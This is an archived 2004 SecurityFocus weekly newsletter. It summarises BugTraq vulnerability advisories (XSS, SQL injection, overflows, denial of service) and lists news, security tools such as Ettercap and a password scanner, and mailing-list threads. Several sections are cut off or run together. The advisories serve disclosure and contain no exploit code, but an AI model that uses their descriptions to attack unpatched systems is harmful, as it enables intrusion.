Free Webinar! Enterprise IM: How IT Managers Can Survive. Featured Speaker:
Nate Root, Senior Analyst, Forrester Research. IT directors and security
managers will gain new insights to balance compliance and security risks.
Highlights an integrated solution from FaceTime Communications and MSN
Messenger Connect for Enterprises. Ideal for financial services,
healthcare, energy companies and other regulated organizations.
View the webinar now!
http://www.securityfocus.com/sponsor/FaceTime_sf-news_040706
I. FRONT AND CENTER
1. Close the E-Mail Wiretap Loophole
2. Multi-Layer Intrusion Detection Systems
3. The Allure and Curse of Complexity
II. BUGTRAQ SUMMARY
1. vBulletin newreply.php Cross-Site Scripting Vulnerability
2. WebSoft HelpDesk PRO SQL Injection Vulnerability
3. WebSoft Infinity WEB SQL Injection Vulnerability
4. MPlayer GUI File Name Buffer Overflow Vulnerability
5. PHPMyFamily Authentication Bypass Vulnerability
6. McMurtrey/Whitaker & Associates Cart32 GetLatestBuilds Scrip...
7. CGIScript.net CSFAQ Script Path Disclosure Vulnerability
8. Apache ap_escape_html Memory Allocation Denial Of Service Vu...
9. CuteNews Multiple Cross-site Scripting Vulnerabilities
10. D-Link AirPlus DI-614+, DI-624, and DI-604 DHCP Server Flood...
11. PowerPortal Multiple Input Validation Vulnerabilities
12. Sun Java Runtime Environment Font Object Assertion Failure D...
13. BEA WebLogic Server And WebLogic Express Application Role Un...
14. Popclient Email Message Buffer Overflow Vulnerability
15. I-Mall Commerce I-mall Script Remote Command Execution Vulne...
16. Microsoft Internet Explorer Cross-Domain Frame Loading Vulne...
17. Dr. Web Unspecified Buffer Overflow Vulnerability
18. phpMyAdmin Multiple Input Validation Vulnerabilities
19. HP-UX ObAM WebAdmin Unspecified Unauthorized Access Vulnerab...
20. HP-UX Undisclosed ARPA Transport Local Denial Of Service Vul...
21. Linux Kernel Sbus PROM Driver Multiple Integer Overflow Vuln...
22. Pavuk Remote Stack-Based Buffer Overrun Vulnerability
23. Linux Kernel IPTables Sign Error Denial Of Service Vulnerabi...
24. HP-UX Netscape Browser Multiple Vulnerabilities
25. Juniper JUNOS Packet Forwarding Engine IPv6 Denial of Servic...
26. Open WebMail Vacation.PL Remote Command Execution Variant Vu...
27. ZyXEL Prestige Router Authentication Password Field Remote D...
28. New Atlanta ServletExec Unauthorized Access Vulnerability
29. RSBAC Jail SUID And SGID File Creation Vulnerability
30. IBM Lotus Domino Server Web Access Malicious Email View Remo...
31. IBM Lotus Domino IMAP Quota Changing Vulnerability
32. FreeBSD Linux Binary Compatibility Memory Access Vulnerabili...
33. Esearch eupdatedb Symbolic Link Vulnerability
34. Netegrity IdentityMinder Multiple Cross-Site Scripting Vulne...
35. Qbik WinGate Information Disclosure Vulnerability
36. IBM Informix I-Spy Local Privilege Escalation Vulnerability
37. SCI Photo Chat Server Cross-Site Scripting Vulnerability
III. SECURITYFOCUS NEWS ARTICLES
1. Gates Defends Microsoft Patch Efforts
2. Wi-fi hopper guilty of cyber-extortion
3. Feds urge secrecy over network outages
4. Bagle source code unleashed
5. IE workaround a non-starter
6. Spanish Zombie PC virus author jailed
IV. SECURITYFOCUS TOP 6 TOOLS
1. mod_auth_nufw 1.0.1
2. Ettercap v0.7.0 pre2
3. Free CPM Cellular Passwords Manager 1.0
4. DumpSIS.pl 0.81
5. CifsPwScanner 1.0.3
6. Wasabi 0.2
V. SECURITYJOBS LIST SUMMARY
1. IT Auditor vacancy UK (Thread)
2. Seeking Information Security Professionals in NYC (Thread)
3. Do you seek an Information Security Expert? (Thread)
4. Sr. Associate - Threat & Vulnerability Management - ... (Thread)
5. New to security field (Thread)
6. Network Security Engineer, NYC (Thread)
7. [WANT] Security or Computer/Tech Support Position (Thread)
8. Security Engineer job opp. @ Reactivity Inc., Belmo... (Thread)
9. Seeking security developers (Thread)
10. Security SW- Tech support- Cupertino, CA- ArcSight (Thread)
11. Information Security with Microsoft emphasis - CA, I... (Thread)
12. Jr. Level Perimeter Security - New York (Thread)
13. Solutions Consultant (SE) - Bay Area (Thread)
14. Security Architect - Boston (Thread)
15. Summertime Positions in Heidelberg, Germany (Thread)
16. MITRE - Information Assurance Architect - Hanover, M... (Thread)
17. Security Consultants: Wash. D.C. or CA- ArcSight (Thread)
18. Security Architect for Federal.- Wash D.C. ArcSight (Thread)
19. WEST COAST SALES ENGINEER (Thread)
20. Security Engineer - LOS ANGELES, CA - Financial Ins... (Thread)
21. Director / VP Business Development--Network Securit... (Thread)
22. IT Security Architect required in the UK (Thread)
VI. INCIDENTS LIST SUMMARY
1. Remote registry changes from an ISA server (Thread)
2. Unknown Malware found csdiv.dll (Thread)
3. Scob infection statistics, etc.. (Thread)
VII. VULN-DEV RESEARCH LIST SUMMARY
NO NEW POSTS FOR THE WEEK 2004-06-29 to 2004-07-06.
VIII. MICROSOFT FOCUS LIST SUMMARY
1. supressing IE (Thread)
2. Non Admin Rights + Visual Studio (Thread)
3. Consumer Security Web Site (Thread)
4. Administrivia: Out of Office Autoreplies (Thread)
5. Article Announcement: Redmond's Butterfly Effect (Thread)
6. SecurityFocus Microsoft Newsletter #195 (Thread)
7. RE: Consumer Security Web Site (Thread)
IX. SUN FOCUS LIST SUMMARY
1. secure NFS problem (Thread)
X. LINUX FOCUS LIST SUMMARY
1. Weird! (Thread)
2. Last login missing (Thread)
3. Error installing Clamav? (Thread)
4. just running tcpdump makes promisc mode? (Thread)
XI. UNSUBSCRIBE INSTRUCTIONS
XII. SPONSOR INFORMATION
I. FRONT AND CENTER
-------------------
1. Close the E-Mail Wiretap Loophole
By Mark Rasch
Some pretty sleazy operators are slipping through a hole in a federal
wiretap law that arguably leaves your e-mail unprotected from snooping.
http://www.securityfocus.com/columnists/253
2. Multi-Layer Intrusion Detection Systems
By Nathan Einwechter
This article discusses framework for a mIDS, a system that brings together
many layers of technology into a single monitoring and analysis engine,
from integrity monitoring software like Tripwire to system logs, IDS logs,
and firewall logs.
http://www.securityfocus.com/infocus/1788
3. The Allure and Curse of Complexity
By Jason Miller
The curse of complexity is the bane of every security administrator, so
UNIX users take your pick: would you like BSD or Linux?
http://www.securityfocus.com/columnists/252
II. BUGTRAQ SUMMARY
-------------------
1. vBulletin newreply.php Cross-Site Scripting Vulnerability
BugTraq ID: 10612
Remote: Yes
Date Published: Jun 26 2004
Relevant URL: http://www.securityfocus.com/bid/10612
Summary:
vBulletin is reportedly affected by a cross-site scripting vulnerability in the newreply.php script. This issue is due to a failure of the application to properly sanitize user-supplied URI input.
An attacker may exploit this issue to have malicious HTML or script code executed in the browser of an unsuspecting user and within the context of a visited web site. This may potentially lead to theft of cookie based authentication credentials, other attacks are also possible.
2. WebSoft HelpDesk PRO SQL Injection Vulnerability
BugTraq ID: 10613
Remote: Yes
Date Published: Jun 26 2004
Relevant URL: http://www.securityfocus.com/bid/10613
Summary:
Reportedly WebSoft HelpDesk PRO is affected by an SQL injection vulnerability. This issue is due to a failure of the application to properly sanitize user supplied URI input.
It is likely that this issue is related to the issue discussed in the vulnerability WebSoft Infinity WEB SQL Injection Vulnerability (BID 10614). This BID will be updated when information becomes available.
An attacker might leverage this issue to inject malicious SQL queries or alter existing ones. This would allow the attacker to manipulate database queries to bypass authentication mechanisms; other attack might also be possible.
3. WebSoft Infinity WEB SQL Injection Vulnerability
BugTraq ID: 10614
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10614
Summary:
Reportedly WebSoft Infinity WEB is affected by an SQL injection vulnerability. This issue is due to a failure of the application to properly sanitize user supplied URI input.
It is likely that this issue is related to the issue discussed in the vulnerability WebSoft HelpDesk PRO SQL Injection Vulnerability (BID 10613). This BID will be updated when information becomes available.
An attacker might leverage this issue to inject malicious SQL queries or alter existing ones. This would allow the attacker to manipulate database queries to bypass authentication mechanisms; other attack might also be possible.
4. MPlayer GUI File Name Buffer Overflow Vulnerability
BugTraq ID: 10615
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10615
Summary:
It has been reported that MPlayer when used with the graphical user interface (GUI) is affected by a buffer overflow vulnerability. This issue is due to a failure of the application to properly handle user-supplied strings when copying them into finite buffers.
Successful exploitation would immediately produce a denial of service condition in the affected process. This issue may also be leveraged to execute code on the affected system within the security context of the user running the vulnerable process.
5. PHPMyFamily Authentication Bypass Vulnerability
BugTraq ID: 10616
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10616
Summary:
phpmyfamily is prone to an authentication bypass vulnerability.
This issue reportedly occurs when the registers_globals PHP configuration directive is enabled. Exploitation could permit an unauthorized remote user to edit site content.
6. McMurtrey/Whitaker & Associates Cart32 GetLatestBuilds Scrip...
BugTraq ID: 10617
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10617
Summary:
Cart32 is reported prone to a cross-site scripting vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data.
A remote attacker can exploit this issue by creating a malicious link to the vulnerable application that includes hostile HTML and script code. If a user follows this link, the hostile code renders in the web browser of the victim user. Theft of cookie-based authentication credentials and other attacks is possible.
Cart32 version 5.0 and prior are considered prone to this issue.
7. CGIScript.net CSFAQ Script Path Disclosure Vulnerability
BugTraq ID: 10618
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10618
Summary:
A vulnerability has been identified in the application that may allow an attacker to disclose the installation path.
Successful exploitation of this vulnerability may allow an attacker to gain sensitive information about the file system that may aid in launching more direct attacks against the system.
All current versions of csFAQ are considered vulnerable to this issue.
8. Apache ap_escape_html Memory Allocation Denial Of Service Vu...
BugTraq ID: 10619
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10619
Summary:
Apache Web Server is reportedly affected by a memory allocation based denial of service vulnerability. This issue is due to a failure of the server to handle excessivley long HTTP header strings.
This issue would allow an attacker to cause the affected application to crash, denying service to legitimate users.
Although Apache version 2.0.49 reportedly affected by this issue, it is likely that earlier versions are affected as well.
9. CuteNews Multiple Cross-site Scripting Vulnerabilities
BugTraq ID: 10620
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10620
Summary:
It is reported that CuteNews is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input.
The problems present themselves when malicious HTML and script code is sent to the application through the 'id' parameter of the multiple scripts.
These issues could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were followed, the hostile code may be rendered in the web browser of the victim user.
10. D-Link AirPlus DI-614+, DI-624, and DI-604 DHCP Server Flood...
BugTraq ID: 10621
Remote: Yes
Date Published: Jun 27 2004
Relevant URL: http://www.securityfocus.com/bid/10621
Summary:
The D-Link DI-614+, DI-624, and DI-604 are reported susceptible to a denial of service vulnerability in their DHCP service.
By flooding the DHCP service with valid DHCP requests, the device will reportedly consume all available memory and eventually reboot.
An attacker may be able to deny service to legitimate users of an affected device by repeatedly causing the device to reboot.
The DI-614+ with firmware revision 2.30, and the DI-604 with unknown firmware were reported vulnerable. The DI-624 Revision B was also confirmed susceptible.
11. PowerPortal Multiple Input Validation Vulnerabilities
BugTraq ID: 10622
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10622
Summary:
PowerPortal is reported prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application:
PowerPortal is prone to multiple cross-site scripting vulnerabilities. These cross-site scripting issues can permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If a user follows the malicious link, the attacker-supplied code executes in the Web browser of the victim computer. This attack can allow for theft of cookie-based authentication credentials and other attacks.
Additionally, PowerPortal is prone to an information disclosure vulnerability. It is reported that a remote attacker may reveal directory listings, by supplying directory traversal sequences to the 'modules.php' script.
The information disclosure vulnerability may be employed by the attacker in order to reveal potentially sensitive information regarding the layout of the filesystem on the affected computer.
12. Sun Java Runtime Environment Font Object Assertion Failure D...
BugTraq ID: 10623
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10623
Summary:
The Sun Java Runtime Environment Font object is reportedly vulnerable to an assertion failure denial of service vulnerability. This issue is due to a failure of the process to handle exceptional conditions when processing font objects.
This issue is reported to affect Java Runtime Environment versions 1.4.1 through 1.4.2; it is likely however that other versions are also affected. This issue will crash Internet browsers running an affected Java plug-in as well.
This issue may be exploited by an attacker to cause a vulnerable application, as well as all processes spawned from the application, to crash, denying service to legitimate users. Due to the scope of the crash, data loss may occur.
13. BEA WebLogic Server And WebLogic Express Application Role Un...
BugTraq ID: 10624
Remote: Yes
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10624
Summary:
WebLogic Server And WebLogic Express are affected by a vulnerability that may unauthorized access to application roles. This issue is due to a failure of the application to properly implement the Servlet 2.3 specification, facilitating unauthorized access.
It should be noted that this issue only arises when a web application is built using the '*' specifier within the '<role-name>' tags, resources are defined to be protected by the '*' specifier, and users exist without explicitly defined roles. Due to the circumstantial nature of this issue, exploitation may be unlikely.
This issue would allow an attacker to carry out actions outside of the defined roles; potentially leading to unauthorized access or other attacks.
14. Popclient Email Message Buffer Overflow Vulnerability
BugTraq ID: 10625
Remote: Yes
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10625
Summary:
It has been reported that popclient is affected by an off by one buffer overflow vulnerability. This issue is due to a failure of the application to properly manage static stack-based buffers.
Successful exploitation of this issue may cause a denial of service condition in the affected application; it is unlikely that this issue could be leveraged to execute code, however it may be possible.
15. I-Mall Commerce I-mall Script Remote Command Execution Vulne...
BugTraq ID: 10626
Remote: Yes
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10626
Summary:
i-mall.cgi is reported prone to a remote arbitrary command execution vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data and may allow a remote attacker to pass arbitrary shell commands to the vulnerable script.
16. Microsoft Internet Explorer Cross-Domain Frame Loading Vulne...
BugTraq ID: 10627
Remote: Yes
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10627
Summary:
Microsoft Internet Explorer is reported prone to a cross-domain frame loading vulnerability. It is reported that if the name of a frame rendered in a target site is known, then an attacker may potentially render arbitrary HTML in the frame of the target site.
An attacker may exploit this vulnerability to spoof an interface of a trusted web site.
17. Dr. Web Unspecified Buffer Overflow Vulnerability
BugTraq ID: 10628
Remote: Yes
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10628
Summary:
It has been reported that an unspecified buffer overflow vulnerability exists in Dr. Web.
Users of Dr. Web have reported seeing this message logged to syslog by ProPolice on OpenBSD computers:
drwebd: stack overflow in function int scanMail(int, time_t *, int, int, const char *)
An unspecified buffer overflow in the scanMail() function may be exploitable. If it is, attempts to exploit it may result in the affected application crashing. This may also be leveraged to execute arbitrary code in the context of the Dr. Web process.
As more information is known, this BID will be updated.
18. phpMyAdmin Multiple Input Validation Vulnerabilities
BugTraq ID: 10629
Remote: Yes
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10629
Summary:
phpMyAdmin is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application:
It is reported that a malicious attacker can add arbitrary servers to phpMyAdmin. By constructing a URI request for the phpMyAdmin 'left.php' script an attacker may specify and add an arbitrary SQL server.
A remote attacker may exploit this vulnerability to replace server configurations and as a result introduce a malicious SQL server into the phpMyAdmin controlled server list.
phpMyAdmin is reported prone to a remote PHP code execution vulnerability. It is reported that a malicious database table name beginning with "'" will escape the quotes in a PHP eval() statement and will thereby permit an attacker to execute arbitrary PHP code.
19. HP-UX ObAM WebAdmin Unspecified Unauthorized Access Vulnerab...
BugTraq ID: 10630
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10630
Summary:
HP-UX ObAM WebAdmin is reported prone to an unspecified vulnerability. This issue may allow a remote attacker to gain unauthorized access to a vulnerable computer.
HP-UX B.11.11 is reported prone to this issue.
Due to a lack of details, further information is not available at the moment. This BID will be updated as more information becomes available.
20. HP-UX Undisclosed ARPA Transport Local Denial Of Service Vul...
BugTraq ID: 10631
Remote: No
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10631
Summary:
HP-UX is reported vulnerable to an undisclosed local denial of service vulnerability.
Reportedly, there exists a flaw in HP-UX's ARPA transport which could be leveraged by a local user to crash the computer.
21. Linux Kernel Sbus PROM Driver Multiple Integer Overflow Vuln...
BugTraq ID: 10632
Remote: No
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10632
Summary:
It is reported that the OpenPROM Linux kernel driver contains multiple integer overflow vulnerabilities.
Two vulnerabilities are reported to exist in the OpenPROM driver, both involve overflowing an integer value. These values are used to allocate kernel memory, and then subsequently to copy data into the kernel. This could lead to overwriting large amounts of kernel memory.
These vulnerabilities could lead to a system crash, or possible code execution in the context of the kernel.
Some versions of the Linux kernel are vulnerable to both overflows, other versions are only susceptible to one. Kernel version 2.6.6 does not appear to be vulnerable.
22. Pavuk Remote Stack-Based Buffer Overrun Vulnerability
BugTraq ID: 10633
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10633
Summary:
Pavuk is reported prone to a remote buffer overrun vulnerability. It is reported that the issue exists due to a lack of boundary checks performed on third party data, that is received from remote HTTP servers, before the data is copied into a finite stack-based buffer.
Ultimately a remote malicious site may exploit this condition to execute arbitrary code in the context of the user who is running the vulnerable Pavuk software.
23. Linux Kernel IPTables Sign Error Denial Of Service Vulnerabi...
BugTraq ID: 10634
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10634
Summary:
It has been reported that the Linux kernel is affected by a denial of service vulnerability in the iptables implementation. This issue is due to a failure of iptables to handle certain TCP packet header values.
An attacker can exploit this issue to cause the iptables implementation to consume all CPU resources due to an infinite loop, denying service to legitimate users.
24. HP-UX Netscape Browser Multiple Vulnerabilities
BugTraq ID: 10635
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10635
Summary:
HP-UX Netscape browser is reported prone to multiple vulnerabilities. These vulnerabilities can allow a remote attacker to carry out attacks such as denial of service, information disclosure, and unauthorized access to a vulnerable computer.
These issues affect Netscape for HP-UX B.11.00, B.11.11, B.11.22, and B.11.23.
25. Juniper JUNOS Packet Forwarding Engine IPv6 Denial of Servic...
BugTraq ID: 10636
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10636
Summary:
Juniper routers running the JUNOS operating system are reported prone to a denial of service vulnerability due to memory exhaustion. An attacker can cause a persistent denial of service condition by repeatedly sending certain IPv6 packets to a router.
This issue affects the JUNOS Packet Forwarding Engine IPv6 branch released after February 24, 2004. All Juniper Networks M-series and T-series routing platforms with IPv6 support are also prone to this issue.
26. Open WebMail Vacation.PL Remote Command Execution Variant Vu...
BugTraq ID: 10637
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10637
Summary:
A vulnerability is reported in Open WebMail that allows a remote attacker to execute arbitrary commands on a vulnerable host.
Exploitation of the vulnerability could allow a non-privileged user to remotely execute arbitrary commands in the context of the web server that is hosting the vulnerable application.
This vulnerability is reported to affect all versions of Open WebMail released before 29/06/2004.
27. ZyXEL Prestige Router Authentication Password Field Remote D...
BugTraq ID: 10638
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10638
Summary:
ZyXEL Prestige routers are reported prone to a remote denial of service vulnerability. The issue is reported to exist due to a lack of boundary checks performed on password string data handled by the device authentication interface.
A remote attacker who has access to the authentication interface of the affected appliance may trigger a device reset at will, effectively denying service to legitimate users.
28. New Atlanta ServletExec Unauthorized Access Vulnerability
BugTraq ID: 10639
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10639
Summary:
It has been reported that New Atlanta ServletExec is affected by an unauthorized access vulnerability; fixes are available. This issue is due to an access validation error.
This issue would allow an attacker to upload and execute files on the affected computer, facilitating unauthorized interactive access as well as other attacks. This issue might also be leveraged to cause a denial of service condition in the affected server.
29. RSBAC Jail SUID And SGID File Creation Vulnerability
BugTraq ID: 10640
Remote: No
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10640
Summary:
The process jail feature of RSBAC reportedly improperly allows files to be created with SUID and SGID attributes.
These files can then be used to escalate the privileges inside the jail. This may allow for further attacks and possible system compromises.
Versions 1.2.2 and 1.2.3 are reported to be vulnerable to this issue. A patch has been released by the vendor.
30. IBM Lotus Domino Server Web Access Malicious Email View Remo...
BugTraq ID: 10641
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10641
Summary:
Lotus Domino Server is reported prone to a remote denial of service vulnerability. The issue is reported to exist when a malicious email that is received on the affected server, is opened through the Domino Web Access interface by a client.
A remote attacker may exploit this condition to deny Lotus Domino service to legitimate users.
31. IBM Lotus Domino IMAP Quota Changing Vulnerability
BugTraq ID: 10642
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10642
Summary:
IBM Lotus Domino server is reported to improperly allow users to alter their own mail storage quota values.
A user's mailbox is assigned a quota to limit the amount of data that can be consumed by email on the server. This quota is assigned by the administrator of the application.
An attacker could possibly use this vulnerability to raise their mailbox's quota to a very large amount, and then proceed to fill the mail servers storage device. This will result in a denial of service condition, where new mail will not be able to be stored on the full disk.
Domino version 6.5.0 and 6.5.1 are reported vulnerable to this issue.
32. FreeBSD Linux Binary Compatibility Memory Access Vulnerabili...
BugTraq ID: 10643
Remote: No
Date Published: Jul 01 2004
Relevant URL: http://www.securityfocus.com/bid/10643
Summary:
It has been reported that FreeBSD is affected by a memory access vulnerability when implementing linux binary compatibility. This issue is due to a programming error that causes certain memory to be accessed without proper validation.
This issue would allow an attacker to disclose and overwrite kernel memory, resulting in information disclosure, privilege escalation and potential denial of service.
33. Esearch eupdatedb Symbolic Link Vulnerability
BugTraq ID: 10644
Remote: No
Date Published: Jul 01 2004
Relevant URL: http://www.securityfocus.com/bid/10644
Summary:
It has been reported that eupdatedb, an esearch utility is affected by a symbolic link vulnerability. This issue is due to a failure of the application to properly handle temporary file creation.
An attacker can leverage this vulnerability to create an arbitrary file with the permissions of an unsuspecting user that has activated the vulnerable utility; facilitating a number of possible attacks.
34. Netegrity IdentityMinder Multiple Cross-Site Scripting Vulne...
BugTraq ID: 10645
Remote: Yes
Date Published: Jul 01 2004
Relevant URL: http://www.securityfocus.com/bid/10645
Summary:
Netegrity IdentityMinder is a tool designed for the Microsoft Windows platform to manage and maintain users and user accounts. The tool supports a web based interface for creating and removing users in multi-user environments.
It has been reported that Netegrity IdentityMinder is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input.
A remote attacker can exploit this issue by creating a malicious link to the vulnerable application that includes hostile HTML and script code. If this link were followed by an unsuspecting user, the hostile code may be rendered in the their web browser. This would occur in the security context of the web server and may allow for theft of cookie-based authentication credentials as well as arbitrary application command execution.
35. Qbik WinGate Information Disclosure Vulnerability
BugTraq ID: 10646
Remote: Yes
Date Published: Jul 02 2004
Relevant URL: http://www.securityfocus.com/bid/10646
Summary:
WinGate is reported susceptible to an information disclosure vulnerability in its HTTP proxy server.
An internal web server contained in WinGate improperly allows attackers access to read arbitrary files outside of its document root. WinGate by default runs as the localsystem user, therefore this vulnerability allows remote attackers to read system files.
An attacker can exploit this issue to read arbitrary files contained on the WinGate computer. These files may contain sensitive information that may aid in further attacks.
36. IBM Informix I-Spy Local Privilege Escalation Vulnerability
BugTraq ID: 10647
Remote: No
Date Published: Jul 02 2004
Relevant URL: http://www.securityfocus.com/bid/10647
Summary:
It is reported that I-Spy is susceptible to a privilege escalation vulnerability in its 'runbin' binary.
The 'runbin' binary uses its argv[0] to determine both the name of a binary to run, and the path to that binary. 'runbin' is installed setuid root by default.
An attacker with local interactive access to a computer with an affected version of I-Spy installed would be able to exploit this fact to cause attacker specified binaries to be run as the superuser.
I-Spy version 2.x is reported vulnerable to this issue.
37. SCI Photo Chat Server Cross-Site Scripting Vulnerability
BugTraq ID: 10648
Remote: Yes
Date Published: Jul 02 2004
Relevant URL: http://www.securityfocus.com/bid/10648
Summary:
SCI Photo Chat is reported susceptible to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input.
The web server component of SCI Chat server will display an error message when it receives an HTTP request for an invalid file. This error message includes the complete unsanitized content of the original request.
A remote attacker can exploit this issue by creating a malicious link to the vulnerable application that includes hostile HTML and script code. If this link were followed by an unsuspecting user, the hostile code may be rendered in the their web browser. This would occur in the security context of the web server and may allow for theft of cookie-based authentication credentials or other attacks.
III. SECURITYFOCUS NEWS ARTICLES
--------------------------------
1. Gates Defends Microsoft Patch Efforts
By: Patrick Gray
Microsoft chairman downplays the role that unpatched vulnerabilities played in last week's Russian hack attacks.
http://www.securityfocus.com/news/9004
2. Wi-fi hopper guilty of cyber-extortion
By: Kevin Poulsen
FBI agents initially traced threats to a suburban dentist's office, and other spots with unsecured wireless networks.
http://www.securityfocus.com/news/8991
3. Feds urge secrecy over network outages
By: Kevin Poulsen
The Department of Homeland Security wants details of major service outages kept out of the public eye.
http://www.securityfocus.com/news/8966
4. Bagle source code unleashed
By: John Leyden, The Register
Virus writers are distributing viral source code with the latest version of the Bagle virus series, Bagle-AD. Much like its 29 predecessors, Bagle-AD is a mass-mailing worm that is packed using UPX file compression.
http://www.securityfocus.com/news/9059
5. IE workaround a non-starter
By: John Leyden, The Register
Doubts have been raised about the effectiveness of a workaround issued by Microsoft to guard against a potentially devastating vulnerability in IE. Left unchecked the flaw creates a means for hackers to turn popular websites into conduits for viral transmission.
http://www.securityfocus.com/news/9054
6. Spanish Zombie PC virus author jailed
By: John Leyden, The Register
A Spanish man was sent to jail for two years last week after being convicted of virus writing. Óscar López Hinarejos, 26, was also ordered to pay compensation to his victims for writing the Cabronator Trojan.
http://www.securityfocus.com/news/9053
IV. SECURITYFOCUS TOP 6 TOOLS
-----------------------------
1. mod_auth_nufw 1.0.1
By: Vincent Deffontaines
Relevant URL: http://freshmeat.net/redir/modauthnufw/51307/url_homepage/article.php3
Platforms:
Summary:
mod_auth_nufw is a Single Sign On Apache module which performs secure user identification and authentication, based on the Nufw firewalling suite. Nufw marks all connections of a network with a unique UserID. This module takes advantage of that mark and uses it to transparently identify and authenticate users requiring access to an Apache server.
2. Ettercap v0.7.0 pre2
By: ALoR <alor (at) users.sourceforge (dot) net [email concealed]>
Relevant URL: http://ettercap.sourceforge.net/
Platforms: FreeBSD, Linux, MacOS, NetBSD, Windows 2000, Windows NT, Windows XP
Summary:
Ettercap is a network sniffer/interceptor/logger for ethernet LANs. It supports active and passive dissection of many protocols (even ciphered ones, like SSH and HTTPS). Data injection in an established connection and filtering on the fly is also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN.
Enter our downloads page to find the free Cellular Passwords Manager.A J2ME program that will manage all your sites/accounts passwords and IDs.The program is PIN protected, simple Menu driven.
This program is part of the CAT Cellular Authentication token. The CAT manages the OTPs and Fixed IDs/Passwords accounts.
4. DumpSIS.pl 0.81
By: Jimmy Shah
Relevant URL: http://www.geocities.com/jfldars/DumpSIS.zip
Platforms: Perl (any system supporting perl)
Summary:
Symbian SIS file dumping utility that allows for analysis of potential malware without actual installation of files.
It has been field tested by various Antivirus researchers, who used it to help analyze the the recent Symbian Carib Worm.
A CIFS/SMB password scanner based on the jcifs implementation. The scanner and jcifs are both 100% pure java, making it possible to run the scanner on a few different platforms.
6. Wasabi 0.2
By: Andrea Barisani
Relevant URL: http://www.gentoo.org/proj/en/infrastructure/wasabi
Platforms: Perl (any system supporting perl)
Summary:
Wasabi is a log monitoring program, designed to watch a log file for lines matching user defined regular expression and report on the matches. The regular expressions are assigned to queues which have an alert interval and a list of mail recipients.
Queues can be set to send a notification as soon as there is a log line assigned to it, or to send periodic reports.
Additionally, uninteresting fields in the log lines (such as PID numbers) can be masked with the standard regular ex
V. SECURITYJOBS LIST SUMMARY
----------------------------
1. IT Auditor vacancy UK (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/368053
2. Seeking Information Security Professionals in NYC (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/368030
3. Do you seek an Information Security Expert? (Thread)
Relevant URL:
4. just running tcpdump makes promisc mode? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/91/367997
XI. UNSUBSCRIBE INSTRUCTIONS
----------------------------
To unsubscribe send an e-mail message to sf-news-unsubscribe (at) securityfocus (dot) com [email concealed] from the subscribed address. The contents of the subject or message body do not matter. You will receive a confirmation request message to which you will have to answer. Alternatively you can also visit http://www.securityfocus.com/newsletters and unsubscribe via the website.
If your email address has changed email listadmin (at) securityfocus (dot) com [email concealed] and ask to be manually removed.
XII. SPONSOR INFORMATION
-----------------------
This issue sponsored by: FaceTime
Free Webinar! Enterprise IM: How IT Managers Can Survive. Featured Speaker:
Nate Root, Senior Analyst, Forrester Research. IT directors and security
managers will gain new insights to balance compliance and security risks.
Highlights an integrated solution from FaceTime Communications and MSN
Messenger Connect for Enterprises. Ideal for financial services,
healthcare, energy companies and other regulated organizations.
View the webinar now!
http://www.securityfocus.com/sponsor/FaceTime_sf-news_040706
------------------------------
This issue sponsored by: FaceTime
Free Webinar! Enterprise IM: How IT Managers Can Survive. Featured Speaker:
Nate Root, Senior Analyst, Forrester Research. IT directors and security
managers will gain new insights to balance compliance and security risks.
Highlights an integrated solution from FaceTime Communications and MSN
Messenger Connect for Enterprises. Ideal for financial services,
healthcare, energy companies and other regulated organizations.
View the webinar now!
